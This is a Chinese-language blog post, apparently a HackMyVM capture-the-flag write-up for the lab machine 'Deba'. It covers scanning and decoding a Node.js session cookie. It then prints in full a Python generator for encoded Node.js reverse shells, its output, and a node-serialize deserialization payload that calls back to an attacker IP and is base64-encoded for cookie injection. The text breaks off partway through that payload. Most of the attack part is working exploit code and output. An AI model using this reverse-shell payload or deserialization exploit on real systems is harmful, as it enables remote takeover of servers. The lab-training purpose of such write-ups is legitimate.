{"id":886,"date":"2025-06-17T23:12:35","date_gmt":"2025-06-17T15:12:35","guid":{"rendered":"http:\/\/162.14.82.114\/?p=886"},"modified":"2025-06-17T23:12:35","modified_gmt":"2025-06-17T15:12:35","slug":"hmv-_-deba","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/886\/06\/17\/2025\/","title":{"rendered":"hmv[-_-]Deba"},"content":{"rendered":"

Deba<\/h1>\n

\"image-20250616175838254\"<\/div>
\n
\"image-20250617134421085\"<\/div><\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Deba]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog         :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nI scanned my computer so many times, it thinks we're dating.\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.102:22\nOpen 192.168.10.102:80\nOpen 192.168.10.102:3000\n\nPORT     STATE SERVICE REASON         VERSION\n22\/tcp   open  ssh     syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 22:e4:1e:f3:f6:82:7b:26:da:13:2f:01:f9:d5:0d:5b (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3jDMZ9e3Dizy\/56KbtO6qYJrxIUGMqGoi7jvTWFRivqr8zA3mhUw1AU+1QxQu5XzfdUf7GCZD+JQ8bgZq9a1r4AxtBJ\/1oGZWppdLgKX42WIVj3YEsQ\/APO9e7H\/9tVL\/3\/HsbilmE0D65dirwOTOPAd8bUF8PEDbYmCIqtpVMsFZPGo79h25G8eZV8C0WSVyMMDzCSPQLk2QQtxZrlZbo7VPKq4MklKCUUqVxJdUrP9LMx6RvJeN5Suvddv65XPtFKrCi8NKnqt9FRivCYD0eVj91eiqDShStxI3YhOdoen7WvelfiC2DdyV3BwCHQIzBvk7iSt+DPEPVZGFvTMX\n|   256 7b:09:3e:d4:a7:2d:92:01:9d:7d:7f:32:c1:fd:93:5b (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKi7LlQwUJwp6ZPk+FVpQzL6PnDtnjte5+4zfUyN84Kj4xBOljzVRs5sXulJQreYlgcsZ6nw1KipvPs4l2TYgmI=\n|   256 56:fd:3d:c2:19:fe:22:24:ca:2c:f8:07:90:1d:76:87 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIPZhEkLZvEED22fnHnSt36d1uAB\/zWnv883w8sWybcs\n80\/tcp   open  http    syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))\n| http-methods: \n|_  Supported Methods: GET POST OPTIONS HEAD\n|_http-title: Apache2 Debian Default Page: It works\n|_http-server-header: Apache\/2.4.38 (Debian)\n3000\/tcp open  http    syn-ack ttl 64 Node.js Express framework\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-title: Site doesn't have a title (text\/html; charset=utf-8).\nMAC Address: 08:00:27:32:F2:2A (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n
\u663e\u793a3000<\/code>\u7aef\u53e3\u8fd0\u884c\u4e86node.js<\/code>\u670d\u52a1\u3002<\/p>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Deba]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x html txt php -d 2 2>\/dev\/null\n\n404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n200      GET      368l      933w    10701c http:\/\/192.168.10.102\/index.html\n200      GET       24l      126w    10356c http:\/\/192.168.10.102\/icons\/openlogo-75.png\n200      GET      368l      933w    10701c http:\/\/192.168.10.102\/\n[####################] - 2m    882204\/882204  0s      found:3       errors:902    \n[####################] - 2m    882184\/882184  7513\/s  http:\/\/192.168.10.102\/ <\/code><\/pre>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u654f\u611f\u7aef\u53e3<\/h3>\n
\"image-20250617134926430\"<\/div><\/p>\n
\u91cd\u65b0\u641c\u96c6\u4e00\u4e0b\u76f8\u5173\u4fe1\u606f\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Deba]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP:3000\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x html txt php -d 2 2>\/dev\/null\n\n404      GET       10l       15w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n200      GET        1l        2w       11c http:\/\/192.168.10.102:3000\/\n<\/code><\/pre>\n
\u6ca1\u53d1\u73b0\u4e1c\u897f\u3002\u3002\u3002\u3002<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Deba]\n\u2514\u2500$ curl -s -I http:\/\/192.168.10.102:3000                                                                                                        \nHTTP\/1.1 200 OK\nX-Powered-By: Express\nSet-Cookie: profile=eyJ1c2VybmFtZSI6ImFqaW4iLCJjb3VudHJ5IjoiaW5kaWEiLCJjaXR5IjoiYmFuZ2Fsb3JlIn0%3D; Max-Age=900; Path=\/; Expires=Tue, 17 Jun 2025 06:08:33 GMT; HttpOnly\nContent-Type: text\/html; charset=utf-8\nContent-Length: 11\nETag: W\/"b-Ck1VqNd45QIvq3AZd8XYQLvEhtA"\nDate: Tue, 17 Jun 2025 05:53:33 GMT\nConnection: keep-alive\nKeep-Alive: timeout=5\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Deba]\n\u2514\u2500$ echo "eyJ1c2VybmFtZSI6ImFqaW4iLCJjb3VudHJ5IjoiaW5kaWEiLCJjaXR5IjoiYmFuZ2Fsb3JlIn0" | base64 -d\n{"username":"ajin","country":"india","city":"bangalore"} <\/code><\/pre>\n
\u53d1\u73b0\u4e0d\u5b89\u5168\u7684 cookie\uff01<\/p>\n
node.js cookie\u4e0d\u5b89\u5168\u914d\u7f6e<\/h3>\n
\"image-20250617140147744\"<\/div>
\n
\"image-20250617140038684\"<\/div><\/p>\n
\u5c1d\u8bd5\u5229\u7528\u5176\u8fdb\u884c\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Deba]\n\u2514\u2500$ cat nodejsshell.py                                         \n#!\/usr\/bin\/python\n# Generator for encoded NodeJS reverse shells\n# Based on the NodeJS reverse shell by Evilpacket\n# https:\/\/github.com\/evilpacket\/node-shells\/blob\/master\/node_revshell.js\n# Onelineified and suchlike by infodox (and felicity, who sat on the keyboard)\n# Insecurety Research (2013) - insecurety.net\n\n# This script is to exploit Desearilazation vulnerability in nodejs and perform RCE\n# Usage nodejsshell.py 10.10.14.239 80\n# Ref https:\/\/www.exploit-db.com\/docs\/english\/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf\n\nimport sys\n\nif len(sys.argv) != 3:\n    print "Usage: %s <LHOST> <LPORT>" % (sys.argv[0])\n    sys.exit(0)\n\nIP_ADDR = sys.argv[1]\nPORT = sys.argv[2]\n\ndef charencode(string):\n    """String.CharCode"""\n    encoded = ''\n    for char in string:\n        encoded = encoded + "," + str(ord(char))\n    return encoded[1:]\n\nprint "[+] LHOST = %s" % (IP_ADDR)\nprint "[+] LPORT = %s" % (PORT)\nNODEJS_REV_SHELL = '''\nvar net = require('net');\nvar spawn = require('child_process').spawn;\nHOST="%s";\nPORT="%s";\nTIMEOUT="5000";\nif (typeof String.prototype.contains === 'undefined') { String.prototype.contains = function(it) { return this.indexOf(it) != -1; }; }\nfunction c(HOST,PORT) {\n    var client = new net.Socket();\n    client.connect(PORT, HOST, function() {\n        var sh = spawn('\/bin\/sh',[]);\n        client.write("Connected!\\\\n");\n        client.pipe(sh.stdin);\n        sh.stdout.pipe(client);\n        sh.stderr.pipe(client);\n        sh.on('exit',function(code,signal){\n          client.end("Disconnected!\\\\n");\n        });\n    });\n    client.on('error', function(e) {\n        setTimeout(c(HOST,PORT), TIMEOUT);\n    });\n}\nc(HOST,PORT);\n''' % (IP_ADDR, PORT)\nprint "[+] Encoding"\nPAYLOAD = charencode(NODEJS_REV_SHELL)\nprint "eval(String.fromCharCode(%s))" % (PAYLOAD)<\/code><\/pre>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Deba]\n\u2514\u2500$ python2 nodejsshell.py 192.168.10.107 1234\n[+] LHOST = 192.168.10.107\n[+] LPORT = 1234\n[+] Encoding\neval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,57,50,46,49,54,56,46,49,48,46,49,48,55,34,59,10,80,79,82,84,61,34,49,50,51,52,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))<\/code><\/pre>\n
\u5177\u4f53\u4f7f\u7528\u53c2\u8003\uff1ahttps:\/\/www.exploit-db.com\/docs\/english\/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf<\/a><\/p>\n
# {"rce":"_$$ND_FUNC$$_function (){\u751f\u6210\u7684\u6076\u610f\u4ee3\u7801}()"}\n{"rce":"_$$ND_FUNC$$_function (){eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,57,50,46,49,54,56,46,49,48,46,49,48,55,34,59,10,80,79,82,84,61,34,49,50,51,52,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))}()"}<\/code><\/pre>\n
\u7136\u540e\u8fdb\u884cbase64<\/code>\u7f16\u7801\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Deba]\n\u2514\u2500$ echo '{"rce":"_$$ND_FUNC$$_function (){eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,57,50,46,49,54,56,46,49,48,46,49,48,55,34,59,10,80,79,82,84,61,34,49,50,51,52,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))}()"}' | base64   \neyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24gKCl7ZXZhbChTdHJpbmcuZnJvbUNoYXJDb2Rl\nKDEwLDExOCw5NywxMTQsMzIsMTEwLDEwMSwxMTYsMzIsNjEsMzIsMTE0LDEwMSwxMTMsMTE3LDEw\nNSwxMTQsMTAxLDQwLDM5LDExMCwxMDEsMTE2LDM5LDQxLDU5LDEwLDExOCw5NywxMTQsMzIsMTE1\nLDExMiw5NywxMTksMTEwLDMyLDYxLDMyLDExNCwxMDEsMTEzLDExNywxMDUsMTE0LDEwMSw0MCwz\nOSw5OSwxMDQsMTA1LDEwOCwxMDAsOTUsMTEyLDExNCwxMTEsOTksMTAxLDExNSwxMTUsMzksNDEs\nNDYsMTE1LDExMiw5NywxMTksMTEwLDU5LDEwLDcyLDc5LDgzLDg0LDYxLDM0LDQ5LDU3LDUwLDQ2\nLDQ5LDU0LDU2LDQ2LDQ5LDQ4LDQ2LDQ5LDQ4LDU1LDM0LDU5LDEwLDgwLDc5LDgyLDg0LDYxLDM0\nLDQ5LDUwLDUxLDUyLDM0LDU5LDEwLDg0LDczLDc3LDY5LDc5LDg1LDg0LDYxLDM0LDUzLDQ4LDQ4\nLDQ4LDM0LDU5LDEwLDEwNSwxMDIsMzIsNDAsMTE2LDEyMSwxMTIsMTAxLDExMSwxMDIsMzIsODMs\nMTE2LDExNCwxMDUsMTEwLDEwMyw0NiwxMTIsMTE0LDExMSwxMTYsMTExLDExNiwxMjEsMTEyLDEw\nMSw0Niw5OSwxMTEsMTEwLDExNiw5NywxMDUsMTEwLDExNSwzMiw2MSw2MSw2MSwzMiwzOSwxMTcs\nMTEwLDEwMCwxMDEsMTAyLDEwNSwxMTAsMTAxLDEwMCwzOSw0MSwzMiwxMjMsMzIsODMsMTE2LDEx\nNCwxMDUsMTEwLDEwMyw0NiwxMTIsMTE0LDExMSwxMTYsMTExLDExNiwxMjEsMTEyLDEwMSw0Niw5\nOSwxMTEsMTEwLDExNiw5NywxMDUsMTEwLDExNSwzMiw2MSwzMiwxMDIsMTE3LDExMCw5OSwxMTYs\nMTA1LDExMSwxMTAsNDAsMTA1LDExNiw0MSwzMiwxMjMsMzIsMTE0LDEwMSwxMTYsMTE3LDExNCwx\nMTAsMzIsMTE2LDEwNCwxMDUsMTE1LDQ2LDEwNSwxMTAsMTAwLDEwMSwxMjAsNzksMTAyLDQwLDEw\nNSwxMTYsNDEsMzIsMzMsNjEsMzIsNDUsNDksNTksMzIsMTI1LDU5LDMyLDEyNSwxMCwxMDIsMTE3\nLDExMCw5OSwxMTYsMTA1LDExMSwxMTAsMzIsOTksNDAsNzIsNzksODMsODQsNDQsODAsNzksODIs\nODQsNDEsMzIsMTIzLDEwLDMyLDMyLDMyLDMyLDExOCw5NywxMTQsMzIsOTksMTA4LDEwNSwxMDEs\nMTEwLDExNiwzMiw2MSwzMiwxMTAsMTAxLDExOSwzMiwxMTAsMTAxLDExNiw0Niw4MywxMTEsOTks\nMTA3LDEwMSwxMTYsNDAsNDEsNTksMTAsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDEx\nNiw0Niw5OSwxMTEsMTEwLDExMCwxMDEsOTksMTE2LDQwLDgwLDc5LDgyLDg0LDQ0LDMyLDcyLDc5\nLDgzLDg0LDQ0LDMyLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCw0MSwzMiwxMjMs\nMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMTE4LDk3LDExNCwzMiwxMTUsMTA0LDMyLDYxLDMy\nLDExNSwxMTIsOTcsMTE5LDExMCw0MCwzOSw0Nyw5OCwxMDUsMTEwLDQ3LDExNSwxMDQsMzksNDQs\nOTEsOTMsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEw\nLDExNiw0NiwxMTksMTE0LDEwNSwxMTYsMTAxLDQwLDM0LDY3LDExMSwxMTAsMTEwLDEwMSw5OSwx\nMTYsMTAxLDEwMCwzMyw5MiwxMTAsMzQsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIs\nOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0NiwxMTIsMTA1LDExMiwxMDEsNDAsMTE1LDEwNCw0Niwx\nMTUsMTE2LDEwMCwxMDUsMTEwLDQxLDU5LDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDExNSwx\nMDQsNDYsMTE1LDExNiwxMDAsMTExLDExNywxMTYsNDYsMTEyLDEwNSwxMTIsMTAxLDQwLDk5LDEw\nOCwxMDUsMTAxLDExMCwxMTYsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMTE1LDEw\nNCw0NiwxMTUsMTE2LDEwMCwxMDEsMTE0LDExNCw0NiwxMTIsMTA1LDExMiwxMDEsNDAsOTksMTA4\nLDEwNSwxMDEsMTEwLDExNiw0MSw1OSwxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwxMTUsMTA0\nLDQ2LDExMSwxMTAsNDAsMzksMTAxLDEyMCwxMDUsMTE2LDM5LDQ0LDEwMiwxMTcsMTEwLDk5LDEx\nNiwxMDUsMTExLDExMCw0MCw5OSwxMTEsMTAwLDEwMSw0NCwxMTUsMTA1LDEwMywxMTAsOTcsMTA4\nLDQxLDEyMywxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiw5OSwxMDgsMTA1LDEwMSwx\nMTAsMTE2LDQ2LDEwMSwxMTAsMTAwLDQwLDM0LDY4LDEwNSwxMTUsOTksMTExLDExMCwxMTAsMTAx\nLDk5LDExNiwxMDEsMTAwLDMzLDkyLDExMCwzNCw0MSw1OSwxMCwzMiwzMiwzMiwzMiwzMiwzMiwz\nMiwzMiwxMjUsNDEsNTksMTAsMzIsMzIsMzIsMzIsMTI1LDQxLDU5LDEwLDMyLDMyLDMyLDMyLDk5\nLDEwOCwxMDUsMTAxLDExMCwxMTYsNDYsMTExLDExMCw0MCwzOSwxMDEsMTE0LDExNCwxMTEsMTE0\nLDM5LDQ0LDMyLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCwxMDEsNDEsMzIsMTIz\nLDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDExNSwxMDEsMTE2LDg0LDEwNSwxMDksMTAxLDEx\nMSwxMTcsMTE2LDQwLDk5LDQwLDcyLDc5LDgzLDg0LDQ0LDgwLDc5LDgyLDg0LDQxLDQ0LDMyLDg0\nLDczLDc3LDY5LDc5LDg1LDg0LDQxLDU5LDEwLDMyLDMyLDMyLDMyLDEyNSw0MSw1OSwxMCwxMjUs\nMTAsOTksNDAsNzIsNzksODMsODQsNDQsODAsNzksODIsODQsNDEsNTksMTApKX0oKSJ9Cg==<\/code><\/pre>\n
\u5c06\u6076\u610f\u4ee3\u7801\u8bbe\u7f6e\u4e3acookie<\/code>\u5373\u53ef\uff0c\u4f46\u662f\uff1a<\/p>\n
\"image-20250617142612806\"<\/div>
\n
\"image-20250617142641078\"<\/div><\/p>\n
\u81ea\u52a8\u6362\u884c\u4e86\uff0c\u5c06\u6362\u884c\u7b26\u8fdb\u884c\u8f6c\u5316\u6389\uff1a<\/p>\n
\"image-20250617143601721\"<\/div><\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Deba]\n\u2514\u2500$ cat log | tr -d "\\n"\neyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24gKCl7ZXZhbChTdHJpbmcuZnJvbUNoYXJDb2RlKDEwLDExOCw5NywxMTQsMzIsMTEwLDEwMSwxMTYsMzIsNjEsMzIsMTE0LDEwMSwxMTMsMTE3LDEwNSwxMTQsMTAxLDQwLDM5LDExMCwxMDEsMTE2LDM5LDQxLDU5LDEwLDExOCw5NywxMTQsMzIsMTE1LDExMiw5NywxMTksMTEwLDMyLDYxLDMyLDExNCwxMDEsMTEzLDExNywxMDUsMTE0LDEwMSw0MCwzOSw5OSwxMDQsMTA1LDEwOCwxMDAsOTUsMTEyLDExNCwxMTEsOTksMTAxLDExNSwxMTUsMzksNDEsNDYsMTE1LDExMiw5NywxMTksMTEwLDU5LDEwLDcyLDc5LDgzLDg0LDYxLDM0LDQ5LDU3LDUwLDQ2LDQ5LDU0LDU2LDQ2LDQ5LDQ4LDQ2LDQ5LDQ4LDU1LDM0LDU5LDEwLDgwLDc5LDgyLDg0LDYxLDM0LDQ5LDUwLDUxLDUyLDM0LDU5LDEwLDg0LDczLDc3LDY5LDc5LDg1LDg0LDYxLDM0LDUzLDQ4LDQ4LDQ4LDM0LDU5LDEwLDEwNSwxMDIsMzIsNDAsMTE2LDEyMSwxMTIsMTAxLDExMSwxMDIsMzIsODMsMTE2LDExNCwxMDUsMTEwLDEwMyw0NiwxMTIsMTE0LDExMSwxMTYsMTExLDExNiwxMjEsMTEyLDEwMSw0Niw5OSwxMTEsMTEwLDExNiw5NywxMDUsMTEwLDExNSwzMiw2MSw2MSw2MSwzMiwzOSwxMTcsMTEwLDEwMCwxMDEsMTAyLDEwNSwxMTAsMTAxLDEwMCwzOSw0MSwzMiwxMjMsMzIsODMsMTE2LDExNCwxMDUsMTEwLDEwMyw0NiwxMTIsMTE0LDExMSwxMTYsMTExLDExNiwxMjEsMTEyLDEwMSw0Niw5OSwxMTEsMTEwLDExNiw5NywxMDUsMTEwLDExNSwzMiw2MSwzMiwxMDIsMTE3LDExMCw5OSwxMTYsMTA1LDExMSwxMTAsNDAsMTA1LDExNiw0MSwzMiwxMjMsMzIsMTE0LDEwMSwxMTYsMTE3LDExNCwxMTAsMzIsMTE2LDEwNCwxMDUsMTE1LDQ2LDEwNSwxMTAsMTAwLDEwMSwxMjAsNzksMTAyLDQwLDEwNSwxMTYsNDEsMzIsMzMsNjEsMzIsNDUsNDksNTksMzIsMTI1LDU5LDMyLDEyNSwxMCwxMDIsMTE3LDExMCw5OSwxMTYsMTA1LDExMSwxMTAsMzIsOTksNDAsNzIsNzksODMsODQsNDQsODAsNzksODIsODQsNDEsMzIsMTIzLDEwLDMyLDMyLDMyLDMyLDExOCw5NywxMTQsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiwzMiw2MSwzMiwxMTAsMTAxLDExOSwzMiwxMTAsMTAxLDExNiw0Niw4MywxMTEsOTksMTA3LDEwMSwxMTYsNDAsNDEsNTksMTAsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0Niw5OSw